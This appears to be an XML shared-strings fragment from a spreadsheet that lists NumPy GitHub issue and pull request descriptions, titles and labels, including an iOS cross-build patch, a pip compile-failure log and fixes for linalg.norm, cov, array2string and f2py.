    <t>When building NumPy for iOS, you build on macOS, with compiler flags to target iOS or the iOS simulator. However, setup.py runs on macOS, so sys.platform == 'darwin', regardless of the platform being targetted._x000D_
_x000D_
distutils provides an environment variable - _PYTHON_HOST_PLATFORM - to indicate when you are building for a different platform. This patches uses that variable to identify cross-platform builds and disable macOS specific features._x000D_
_x000D_
The patch also renames an internal method (extend) in multifunc/strfuncs.c to avoid a collision with a symbol in iOS's standard library, and includes math.h in the f2c headers to avoid errors about undefined symbols.</t>
  </si>
  <si>
    <t>BLD: Add configuration changes to allow cross platform builds for iOS.</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: build']</t>
  </si>
  <si>
    <t>Placed the fix in a location so that other edge cases are not incorrect, and added a test to check for the specific edge case._x000D_
_x000D_
Closes #10655</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: Fix problems with linalg.norm with ord=numpy.inf </t>
  </si>
  <si>
    <t>When I was trying to install numpy with pip, I got a compilation error:_x000D_
_x000D_
```_x000D_
    creating build/temp.macosx-10.9-x86_64-3.7/numpy/random/mtrand_x000D_
    compile options: '-D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -Inumpy/core/include -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/include/numpy -Inumpy/core/src/private -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/private -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/npymath -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/private -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/npymath -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/private -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/npymath -c'_x000D_
    gcc: numpy/random/mtrand/mtrand.c_x000D_
    numpy/random/mtrand/mtrand.c:45472:21: error: no member named 'exc_type' in 'struct _ts'_x000D_
        *type = tstate-&gt;exc_type;_x000D_
                ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45473:22: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        *value = tstate-&gt;exc_value;_x000D_
                         ^~~~~~~~~_x000D_
                         curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45474:19: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        *tb = tstate-&gt;exc_traceback;_x000D_
                      ^~~~~~~~~~~~~_x000D_
                      curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45481:24: error: no member named 'exc_type' in 'struct _ts'_x000D_
        tmp_type = tstate-&gt;exc_type;_x000D_
                   ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45482:25: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        tmp_value = tstate-&gt;exc_value;_x000D_
                            ^~~~~~~~~_x000D_
                            curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45483:22: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        tmp_tb = tstate-&gt;exc_traceback;_x000D_
                         ^~~~~~~~~~~~~_x000D_
                         curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45484:13: error: no member named 'exc_type' in 'struct _ts'_x000D_
        tstate-&gt;exc_type = type;_x000D_
        ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45485:13: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        tstate-&gt;exc_value = value;_x000D_
                ^~~~~~~~~_x000D_
                curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45486:13: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        tstate-&gt;exc_traceback = tb;_x000D_
                ^~~~~~~~~~~~~_x000D_
                curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45541:24: error: no member named 'exc_type' in 'struct _ts'_x000D_
        tmp_type = tstate-&gt;exc_type;_x000D_
                   ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45542:25: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        tmp_value = tstate-&gt;exc_value;_x000D_
                            ^~~~~~~~~_x000D_
                            curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45543:22: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        tmp_tb = tstate-&gt;exc_traceback;_x000D_
                         ^~~~~~~~~~~~~_x000D_
                         curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45544:13: error: no member named 'exc_type' in 'struct _ts'_x000D_
        tstate-&gt;exc_type = local_type;_x000D_
        ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45545:13: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        tstate-&gt;exc_value = local_value;_x000D_
                ^~~~~~~~~_x000D_
                curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45546:13: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        tstate-&gt;exc_traceback = local_tb;_x000D_
                ^~~~~~~~~~~~~_x000D_
                curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    15 errors generated._x000D_
    numpy/random/mtrand/mtrand.c:45472:21: error: no member named 'exc_type' in 'struct _ts'_x000D_
        *type = tstate-&gt;exc_type;_x000D_
                ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45473:22: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        *value = tstate-&gt;exc_value;_x000D_
                         ^~~~~~~~~_x000D_
                         curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45474:19: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        *tb = tstate-&gt;exc_traceback;_x000D_
                      ^~~~~~~~~~~~~_x000D_
                      curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45481:24: error: no member named 'exc_type' in 'struct _ts'_x000D_
        tmp_type = tstate-&gt;exc_type;_x000D_
                   ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45482:25: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        tmp_value = tstate-&gt;exc_value;_x000D_
                            ^~~~~~~~~_x000D_
                            curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45483:22: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        tmp_tb = tstate-&gt;exc_traceback;_x000D_
                         ^~~~~~~~~~~~~_x000D_
                         curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45484:13: error: no member named 'exc_type' in 'struct _ts'_x000D_
        tstate-&gt;exc_type = type;_x000D_
        ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45485:13: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        tstate-&gt;exc_value = value;_x000D_
                ^~~~~~~~~_x000D_
                curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45486:13: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        tstate-&gt;exc_traceback = tb;_x000D_
                ^~~~~~~~~~~~~_x000D_
                curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45541:24: error: no member named 'exc_type' in 'struct _ts'_x000D_
        tmp_type = tstate-&gt;exc_type;_x000D_
                   ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45542:25: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        tmp_value = tstate-&gt;exc_value;_x000D_
                            ^~~~~~~~~_x000D_
                            curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45543:22: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        tmp_tb = tstate-&gt;exc_traceback;_x000D_
                         ^~~~~~~~~~~~~_x000D_
                         curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45544:13: error: no member named 'exc_type' in 'struct _ts'_x000D_
        tstate-&gt;exc_type = local_type;_x000D_
        ~~~~~~  ^_x000D_
    numpy/random/mtrand/mtrand.c:45545:13: error: no member named 'exc_value' in 'struct _ts'; did you mean 'curexc_value'?_x000D_
        tstate-&gt;exc_value = local_value;_x000D_
                ^~~~~~~~~_x000D_
                curexc_value_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:237:15: note: 'curexc_value' declared here_x000D_
        PyObject *curexc_value;_x000D_
                  ^_x000D_
    numpy/random/mtrand/mtrand.c:45546:13: error: no member named 'exc_traceback' in 'struct _ts'; did you mean 'curexc_traceback'?_x000D_
        tstate-&gt;exc_traceback = local_tb;_x000D_
                ^~~~~~~~~~~~~_x000D_
                curexc_traceback_x000D_
    /Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m/pystate.h:238:15: note: 'curexc_traceback' declared here_x000D_
        PyObject *curexc_traceback;_x000D_
                  ^_x000D_
    15 errors generated._x000D_
    error: Command "gcc -Wno-unused-result -Wsign-compare -Wunreachable-code -fno-common -dynamic -DNDEBUG -g -fwrapv -O3 -Wall -Wstrict-prototypes -arch x86_64 -g -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -Inumpy/core/include -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/include/numpy -Inumpy/core/src/private -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/Library/Frameworks/Python.framework/Versions/3.7/include/python3.7m -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/private -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/npymath -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/private -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/npymath -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/private -Ibuild/src.macosx-10.9-x86_64-3.7/numpy/core/src/npymath -c numpy/random/mtrand/mtrand.c -o build/temp.macosx-10.9-x86_64-3.7/numpy/random/mtrand/mtrand.o -MMD -MF build/temp.macosx-10.9-x86_64-3.7/numpy/random/mtrand/mtrand.o.d" failed with exit status 1_x000D_
_x000D_
    ----------------------------------------_x000D_
Command "/Library/Frameworks/Python.framework/Versions/3.7/bin/python3.7 -u -c "import setuptools, tokenize;__file__='/private/var/folders/h9/ldhlv7cx44zbbncpzxlkgnnh0000gn/T/pip-build-8roxiu1t/numpy/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" install --record /var/folders/h9/ldhlv7cx44zbbncpzxlkgnnh0000gn/T/pip-ydas6b4v-record/install-record.txt --single-version-externally-managed --compile" failed with error code 1 in /private/var/folders/h9/ldhlv7cx44zbbncpzxlkgnnh0000gn/T/pip-build-8roxiu1t/numpy/_x000D_
```_x000D_
_x000D_
macOS 10.12.3, python 3.7.0b2</t>
  </si>
  <si>
    <t>Failed to Install NumPy with pip on Python 3.7.0b2</t>
  </si>
  <si>
    <t>sample code `from io import StringIO` does not work on python 2.7.14, should be change to `from StringIO import StringIO`</t>
  </si>
  <si>
    <t xml:space="preserve">DOC: Possible error using StringIO in example. </t>
  </si>
  <si>
    <t xml:space="preserve">Proposed this idea in previous pull request (https://github.com/numpy/numpy/pull/10683) and made suggested changes for implementing this idea to have relevant common indices that correspond to the values in the intersection of the two arrays._x000D_
</t>
  </si>
  <si>
    <t>ENH: Modify intersect1d to return common indices</t>
  </si>
  <si>
    <t xml:space="preserve">```_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; a=np.array([1,2,3,4,5,6,7,8,9,10])_x000D_
&gt;&gt;&gt; weights=np.array([0.8,0.1,0.1,0.1,0.1,0.1,0.1,0.1,0.1,0.1])_x000D_
&gt;&gt;&gt; hist, bin_edges = np.histogram(a,bins=10, weights=weights)_x000D_
&gt;&gt;&gt; print(bin_edges)_x000D_
[  1.    1.9   2.8   3.7   4.6   5.5   6.4   7.3   8.2   9.1  10. ]_x000D_
&gt;&gt;&gt; hist, bin_edges = np.histogram(a,bins=10)_x000D_
&gt;&gt;&gt; print(bin_edges)_x000D_
[  1.    1.9   2.8   3.7   4.6   5.5   6.4   7.3   8.2   9.1  10. ]_x000D_
```_x000D_
_x000D_
The bin_edges calculated with and without weights are the same. It seems the weights are ignored in the bin_edges calculation._x000D_
</t>
  </si>
  <si>
    <t>weights argument seems to be ignored in np.histogram</t>
  </si>
  <si>
    <t>I am encountering a error in the np.ones function when I run a script on centos 7.4. The crash occurs in the following lines:_x000D_
a = empty(shape, dtype, order)_x000D_
multiarray.copyto(a, 1, casting='unsafe')_x000D_
The error is: KeyError: 'dict'_x000D_
_x000D_
This is the line I am executing:_x000D_
self.x = np.ascontiguousarray(np.ones((1, 1), dtype=np.float32))_x000D_
_x000D_
I do not observe the problem on other operating systems (ubuntu, mac). Is this a known issue?</t>
  </si>
  <si>
    <t>Crash in np.ones on centos</t>
  </si>
  <si>
    <t xml:space="preserve">This patch simply unifies the docstrings for np.empty, np.ones, and np.zeros._x000D_
_x000D_
There are other inconsistencies relating to docstrings, that I decided not to fix (in matlib.py, with the same functions for matrices)._x000D_
_x000D_
closes #10611 </t>
  </si>
  <si>
    <t>DOC: zeros, empty, and ones now have consistent docstrings</t>
  </si>
  <si>
    <t xml:space="preserve">```_x000D_
&gt;&gt;&gt; np.iinfo('intc')_x000D_
iinfo(min=-2147483648, max=2147483647, dtype=int32)_x000D_
&gt;&gt;&gt; np.iinfo('uintc')_x000D_
iinfo(min=0, max=4294967295, dtype=uint32)_x000D_
&gt;&gt;&gt; np.iinfo('longlong')_x000D_
iinfo(min=-9223372036854775808, max=9223372036854775807, dtype=int64)_x000D_
&gt;&gt;&gt; np.iinfo('ulonglong')_x000D_
iinfo(min=0, max=18446744073709551615, dtype=uint64)_x000D_
&gt;&gt;&gt; np.iinfo('long')_x000D_
iinfo(min=-9223372036854775808, max=9223372036854775807, dtype=int64)_x000D_
&gt;&gt;&gt; np.iinfo('ulong')_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;ipython-input-20-e783aa7ef3c1&gt;", line 1, in &lt;module&gt;_x000D_
    np.iinfo('ulong')_x000D_
  File "/home/antoine/miniconda3/envs/pyarrow/lib/python3.6/site-packages/numpy/core/getlimits.py", line 516, in __init___x000D_
    raise ValueError("Invalid integer data type.")_x000D_
ValueError: Invalid integer data type._x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>np.iinfo('ulong') fails</t>
  </si>
  <si>
    <t>['00 - Bug', '04 - Documentation', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes multiple cases where unfortunate quoting can cause quoted control characters to be treated as not quoted._x000D_
_x000D_
The easiest to trigger is the ";". Within any quotes it will still be treated as a line separator._x000D_
The parsing of "(" and ")" takes into account single quotes, but not double quotes._x000D_
The "!" parsing will fail if multiple quoted substrings appear on a line, in this case an unquoted "!" will not be recognized/handled._x000D_
</t>
  </si>
  <si>
    <t>BUG: F2py mishandles quoted control characters</t>
  </si>
  <si>
    <t>Fixes #10663 _x000D_
_x000D_
This special-cases 0d arrays so that, only for 0ds, we extract scalars using the ndarray `__getitem__` instead of any subclass's `__getitem__`. In other words it reverts #10544 except for 0d arrays._x000D_
_x000D_
This way we avoid the infinite recursion for subclassed-0d arrays that return 0ds instead of scalars when indexed, yet still pass subclassed-0d values on to the formatter functions when printing n-d array elements._x000D_
_x000D_
This PR does break two tests involving 0d-subclass-object arrays added in #10544, but those failed anyway in &lt;1.13 and 1.14.0. That is, `sub([None, None])` prints as `sub([sub(None, dtype=object), sub(None, dtype=object)], dtype=object)`. I don't see a way of fixing those while not breaking the subclass-nd formatting behavior, which is more important.</t>
  </si>
  <si>
    <t>BUG: Further back-compat fix for subclassed array repr</t>
  </si>
  <si>
    <t xml:space="preserve">(#2407)_x000D_
_x000D_
Allow unicode names in record arrays when datatype specified as tuples in Python 2._x000D_
Name is encoded as ascii if possible, raising an exception if not._x000D_
_x000D_
The result passes round-tripping with pickle_x000D_
_x000D_
```python_x000D_
# -*- coding: UTF-8 -*-_x000D_
from __future__ import unicode_literals, print_function_x000D_
import numpy as np_x000D_
import cPickle as pickle_x000D_
_x000D_
x = np.zeros(1, dtype=[('test', int)])_x000D_
print('created array:', repr(x))_x000D_
_x000D_
y = pickle.loads(pickle.dumps(x))_x000D_
print('round-tripped pickle:', repr(y))_x000D_
assert x == y_x000D_
_x000D_
print('should raise an error now...')_x000D_
x = np.zeros(1, dtype=[('tëßt', int)])_x000D_
_x000D_
```_x000D_
_x000D_
Result:_x000D_
```_x000D_
created array: array([(0,)], dtype=[('test', '&lt;i8')])_x000D_
round-tripped pickle: array([(0,)], dtype=[('test', '&lt;i8')])_x000D_
should raise an error now..._x000D_
Traceback (most recent call last):_x000D_
  File "12.py", line 18, in &lt;module&gt;_x000D_
    x = np.zeros(1, dtype=[('tëßt', int)])_x000D_
UnicodeEncodeError: 'ascii' codec can't encode characters in position 1-2: ordinal not in range(128)_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>ENH: Allow dtype field names to be ascii encoded unicode in Python2</t>
  </si>
  <si>
    <t>Fixes #10652_x000D_
_x000D_
Introduced in a13aad3ac33b629f3e696b4d4d5dbf4b5605d567_x000D_
_x000D_
(milestoned only to indicate that the release notes are 1.15)_x000D_
_x000D_
I think the original rationale for this change was to allow the following change to not break this code_x000D_
```diff_x000D_
+from numpy import *_x000D_
_x000D_
 def my_func(n):_x000D_
     return sum(i*i for i in range(n))_x000D_
```_x000D_
_x000D_
Reasons to deprecate it:_x000D_
* `sum` is the only function to do this, even though `any` and `all` also shadow builtins_x000D_
* It's not documented_x000D_
* It's not consistent with `np.array(generator).sum()`, which already fails.</t>
  </si>
  <si>
    <t>DEP: Deprecate np.sum(generator)</t>
  </si>
  <si>
    <t>['07 - Deprecation', 'component: numpy.core']</t>
  </si>
  <si>
    <t>The check will fail if the covariance matrix is not symmetric, even if it's positive-semidefinite. Warning/error message will now be consistent with the docstring:_x000D_
&gt;Covariance matrix [...] must be symmetric and  positive-semidefinite_x000D_
_x000D_
https://github.com/numpy/numpy/blob/master/numpy/random/mtrand/mtrand.pyx#L4400</t>
  </si>
  <si>
    <t>MAINT: Covariance must be symmetric as well as positive-semidefinite.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: numpy.random']</t>
  </si>
  <si>
    <t>I tested `np.linalg.norm` with the following code, but it seems the type is not preserved correctly.
```py
import numpy as np
for dtype in [np.float16, np.float32, np.float64]:
    a = np.ones((2,), dtype=dtype)
    ret = np.linalg.norm(a, 3, None, False)
    if not (dtype == ret.dtype):
        print('expected', dtype, 'but got', ret.dtype)
```
Without this fix (NumPy 1.14.1):
```
expected &lt;class 'numpy.float16'&gt; but got float64
expected &lt;class 'numpy.float32'&gt; but got float64
```
With NumPy 1.14.1 + this fix, nothing should be printed.
Related to https://github.com/numpy/numpy/pull/10368 and https://github.com/cupy/cupy/pull/875#discussion_r170492773</t>
  </si>
  <si>
    <t>BUG: Fix norm type promotion</t>
  </si>
  <si>
    <t>['00 - Bug', '59 - Needs tests', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>When using cov with a complex input and with aweights specified, cov_x000D_
will error as a result of trying to cast a complex value into a float64._x000D_
This comes about since average is used to calculate the sum of the_x000D_
weights from aweights.  average returns the sum of weights as the same_x000D_
type as its result, not the weights type.  For a complex input m, and_x000D_
any type for aweights, this would result in a complex value for fact._x000D_
It appears the primary purpose of np.float64(fact) is to provide a NaN_x000D_
value from the divide when fact is an integer zero.  This has been_x000D_
replaced by using numpy.divide to replicate the same behavior, but to_x000D_
also handle complex types.</t>
  </si>
  <si>
    <t>BUG: fix complex casting error in cov with aweights</t>
  </si>
  <si>
    <t>Do the operation `ufunc.accumulate(x, out=x)` without making temporary copies. This only requires turning on the `NPY_ITER_OVERLAP_ASSUME_ELEMENTWISE` flags for the input/output arrays in the accumulation._x000D_
_x000D_
&lt;s&gt;This assumes the ufunc innerloops are such that they can do in-place accumulations. This is not true since Numpy 1.13.0 as noted in gh-10664. I revert a problematic commit here, but maybe there is a better solution to this. In any case, **before merging this it's probably necessary to solve gh-10664**.&lt;/s&gt; EDIT: gh-10664 was resolved_x000D_
_x000D_
Before:_x000D_
```_x000D_
In [1]: tmp = np.random.random((13, 31, 5000))_x000D_
In [2]: %timeit np.cumsum(tmp, axis=0)_x000D_
5.16 ms ± 45.9 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)_x000D_
In [3]: %timeit np.cumsum(tmp, out=tmp, axis=0)_x000D_
11.8 ms ± 40.4 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)_x000D_
```_x000D_
After:_x000D_
```_x000D_
In [1]: tmp = np.random.random((13, 31, 5000))_x000D_
In [2]: %timeit np.cumsum(tmp, axis=0)_x000D_
5.08 ms ± 14 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)_x000D_
In [3]: %timeit np.cumsum(tmp, out=tmp, axis=0)_x000D_
4.48 ms ± 148 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)_x000D_
```_x000D_
_x000D_
Fixes gh-10640</t>
  </si>
  <si>
    <t xml:space="preserve"> ENH: umath: don't make temporary copies for in-place accumulation</t>
  </si>
  <si>
    <t>['01 - Enhancement', '03 - Maintenance', 'component: numpy.core']</t>
  </si>
  <si>
    <t>EDIT: the below may not be complete; there seems to be other breakage for structured dtypes._x000D_
_x000D_
The guard against infinite recursion in array2string done in #10544 causes problems for subclasses that count on user-defined formatters to have access to items of their own class; see https://github.com/astropy/astropy/issues/7214.  In particular, astropy's `Angle` class assumed that inside array2print, any item selection would be done using its `__getitem__`, so that even scalars would be returned as array scalars with all the appropriate methods. This assumption broke by the introduction of an `asarray` in #10544. As noted in https://github.com/numpy/numpy/pull/10544#discussion_r170435274, it may be possible to solve this by doing `asarray` inside the numpy formatters, rather than upon entry in `array2print`._x000D_
_x000D_
Here's a minimal testcase:_x000D_
```_x000D_
import numpy as np_x000D_
_x000D_
class DuckCounter(np.ndarray):_x000D_
    def __getitem__(self, item):_x000D_
        result = super(DuckCounter, self).__getitem__(item)_x000D_
        if not isinstance(result, DuckCounter):_x000D_
            result = result[...].view(DuckCounter)_x000D_
        return result_x000D_
            _x000D_
    def to_string(self):_x000D_
        # only on scalers in this example..._x000D_
        return {0: 'zero', 1: 'one', 2: 'two'}.get(self.item(), 'many')_x000D_
    _x000D_
    def __str__(self):_x000D_
        if self.shape == ():_x000D_
            return self.to_string()_x000D_
        else:_x000D_
            return np.array2string(self,_x000D_
                                   formatter={'all': lambda x: x.to_string()})_x000D_
_x000D_
_x000D_
dc = np.arange(5).view(DuckCounter)_x000D_
print(dc)_x000D_
# [zero one two many many]_x000D_
```_x000D_
_x000D_
On numpy 1.14.1, this gives_x000D_
```_x000D_
AttributeError: 'numpy.int64' object has no attribute 'to_string'_x000D_
```</t>
  </si>
  <si>
    <t>Regression: array2string breaks for some subclasses</t>
  </si>
  <si>
    <t>As requested in https://github.com/numpy/numpy/pull/10544#issuecomment-368281014, a reminder to send a warning to the numpy list when a release is about to made, so projects such as scipy and astropy, which do CI against numpy-dev, can check that whatever is about to be released does not break things.</t>
  </si>
  <si>
    <t>Before release, warn that it is due</t>
  </si>
  <si>
    <t>['14 - Release']</t>
  </si>
  <si>
    <t>Inspired while fixing #10652.</t>
  </si>
  <si>
    <t>MAINT: Unify reductions in fromnumeric.py</t>
  </si>
  <si>
    <t>These can be handled generically a level deeper._x000D_
_x000D_
This makes `interp(arr_0d, ...)` return numpy scalars rather than python scalars, which is consistent with other functions within numpy_x000D_
_x000D_
This fixes `np.interp(arr_0d, ..., period=...)` too, which would previously crash._x000D_
_x000D_
Rework of b66a200a4a1e98f1955c8a774e4ebfb4588dab5b</t>
  </si>
  <si>
    <t>BUG/MAINT: Remove special cases for 0d arrays in interp</t>
  </si>
  <si>
    <t>['00 - Bug', '03 - Maintenance', 'component: numpy.core', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>fixed error encountered on passing floats to asscalar()._x000D_
_x000D_
done at HackIllinois 2018</t>
  </si>
  <si>
    <t>fixed asscalar error on floats</t>
  </si>
  <si>
    <t>['00 - Bug', '54 - Needs decision', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>Both were making the normally valid assumption that flatten actually flattens, which turns out to be false for matrices._x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; a = np.matrix([[1, 2, 0]])_x000D_
&gt;&gt;&gt; np.partition(a, 1, axis=None)_x000D_
ValueError: kth(=1) out of bounds (1)_x000D_
&gt;&gt;&gt; np.sort(a, axis=None)_x000D_
matrix([[1, 2, 0]])_x000D_
```_x000D_
_x000D_
Addresses https://github.com/numpy/numpy/issues/4301#issuecomment-35223028, but doesn't actually fix the issue.</t>
  </si>
  <si>
    <t>BUG: Make np.partition and np.sort work on np.matrix when axis=None</t>
  </si>
  <si>
    <t>F2py generates code that uses PyTuple_SetItem on a tuple that has been_x000D_
"used", which is invalid on Pypy._x000D_
_x000D_
Add #ifdefs that make the generated code convert the object to a list,_x000D_
use PyList_SetItem, &lt;s&gt;and then convert it back to a tuple before it is used&lt;/s&gt; and use it_x000D_
as an argument list in a function call._x000D_
_x000D_
This enables scipy.linalg tests to pass on pypy. There is no change of behavior on non-pypy.</t>
  </si>
  <si>
    <t>BUG: f2py: fix f2py generated code to work on Pypy</t>
  </si>
  <si>
    <t>['24 - PyPy', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t>Fixed the error where linalg.norm with ord=numpy.inf does not work for empty array, with the solution specified inte the comments, namely creating a case that checks for such a possibility and returns the norm to be 0 as is should be for empty arrays.</t>
  </si>
  <si>
    <t>Fix linalg.norm with ord=numpy.inf</t>
  </si>
  <si>
    <t>Fixes #10651 by replacing the behaviour of `product` with that of `prod`._x000D_
_x000D_
Also group all the aliases together.</t>
  </si>
  <si>
    <t>MAINT: Remove duplicate implementation for aliased functions.</t>
  </si>
